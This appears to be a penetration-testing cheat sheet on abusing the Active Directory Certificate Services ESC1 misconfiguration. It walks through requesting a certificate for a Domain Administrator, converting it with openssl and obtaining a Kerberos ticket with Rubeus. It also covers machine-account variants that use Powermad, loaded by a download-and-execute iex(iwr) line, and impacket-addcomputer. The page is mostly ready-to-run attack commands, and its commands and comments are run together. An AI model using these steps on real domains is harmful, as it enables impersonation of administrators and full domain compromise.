ESC1 is a privilege escalation vulnerability in certificate templates that allows any user with enrollment rights to supply a subjectAltName (SAN) for any other user or machine in Active Directory in the environment from the Certificate Authority (CA) , this allows the requesting user to receive a certificate for the targeted user and in turn, authenticate as them with the received certificate.
Enrollment rights for a principal we own or are a member of (Domain Users)
Given this information, it is possible to abuse the ESC1 attack vector. As our user is a member of Domain Users we can request a certificate for any other user, ideally, a Domain Administrator.
# Convert the certificate to PFX, optionally setting a password&"C:\Program Files\OpenSSL-Win64\bin\openssl.exe" pkcs12 -in certificate.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0"-export -out certificate.pfx# If Base64 encoding the certificate (Not required)[System.Convert]::ToBase64String((Get-Content-Path ".\certificate.pem"-Encoding Byte)) |Write-Output
# Convert the certificate to PFX, optionally setting a passwordopenssl pkcs12 -in certificate.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0"-export -out certificate.pfx# If Base64 encoding the certificate (Not required)cat certificate.pfx | base64 -w 0
Take either the Base64 output or certificate file path and use with Rubeus to requests a TGT of the target account.
# Syntax (if certificate password was specified)Invoke-Rubeus-Command "asktgt /user:<DomainAdmin> /password:<password> /aes256 /nowrap /getcredential /certificate:<Base64-Cert> or <path to PFX file>"# Syntax (certificate password not specified)Invoke-Rubeus-Command "asktgt /user:<DomainAdmin> /certificate:<Base64-Cert> /aes256 /nowrap /getcredential /certificate:<Base64-Cert> or <path to PFX file>"
# Syntax (if certificate password was specified)Rubeus.exe asktgt /user:<DomainAdmin>/password:<password>/aes256 /nowrap /getcredential /certificate:<Base64-Cert> or <path to PFX file># Syntax (certificate password not specified)Rubeus.exe asktgt /user:<DomainAdmin>/certificate:<Base64-Cert>/aes256 /nowrap /getcredential /certificate:<Base64-Cert> or <path to PFX file>
With a TGT for the impersonated user either pass the ticket directly into the current session, or use createnetonly to create a new sacrificial logon session with the impersonated users ticket (preferred)
Its not uncommon to find the ability for domain computers to have enrollment rights over templates.
To perform this attack you will need to be running a shell in the context of a domain computer (SYSTEM or TGT in memory for a computer account, or if a local administrator certify will attempt to elevate to SYSTEM).
Repeat the steps in the section "Windows Abuse" from the point of requesting the certificate to complete the attack path.
ESC1 - Windows - Machine Account Quota
The above section "ESC1 - Machine Account" presents an overview for abusing the ESC1 vulnerable template by abusing local administrative or SYSTEM level privileges for the current system to leverage the vulnerability.
Another way to leverage this vulnerability for when "Domain Computers" have enrollement rights is by adding a new system to Active Dirctory
Powermad can be used to enumerate for and add a new machine account to the domain.
# Load Powermad into memoryiex (iwr -UseBasicParsing https://raw.githubusercontent.com/Kevin-Robertson/Powermad/master/Powermad.ps1)# Enumerate Machine Account QuotaNew-MachineAccount-MachineAccount <ComputerName># New logon session as the machine accountrunas.exe/user:security.local\EvilComputer$# Run Certify (Without the /machine flag)Invoke-Certify request /[CAName] /template:[Template] /altname:[UsertoImpersonate]
Repeat the steps in the section "Windows Abuse" from the point of requesting the certificate to complete the attack path.
If a template has enrollment rights for domain computers, a machine account can be used to request a certificate to perform the attack. This requires having a hash or password value for a machine account or if the domains machine account quota is greater than zero, adding a new machine ourselves to complete the attack.
# If we do not have existing credentials for a machine account# maybe we can add a new machine account to the domainimpacket-addcomputer security.local/truth:'Password1!'-computer-name EvilComputer$ -computer-pass Password123! -method SAMR -dc-ip 10.10.10.100